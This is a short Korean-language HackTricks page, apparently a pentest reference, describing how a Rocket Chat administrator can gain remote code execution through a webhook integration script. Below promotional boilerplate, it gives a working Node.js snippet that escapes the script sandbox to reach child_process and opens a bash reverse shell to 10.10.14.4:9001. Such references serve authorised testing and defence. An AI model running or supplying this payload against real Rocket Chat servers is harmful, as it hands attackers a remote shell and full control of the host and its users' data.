Rocket Chat

htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm을 팔로우하세요.
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 당신의 해킹 기교를 공유하세요.

Websec | Uw Cybersecurity Specialist

RCE

만약 Rocket Chat 내에서 관리자 권한을 가지고 있다면 RCE를 얻을 수 있습니다.

**Integrations**로 이동하고 **New Integration**을 선택하고 Incoming WebHook 또는 **Outgoing WebHook**을 선택합니다.
/admin/integrations/incoming

문서에 따르면 둘 다 ES2015 / ECMAScript 6 (기본적으로 JavaScript)를 사용하여 데이터를 처리합니다. 그래서 nodejs를 위한 rev shell을 가져오겠습니다.

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")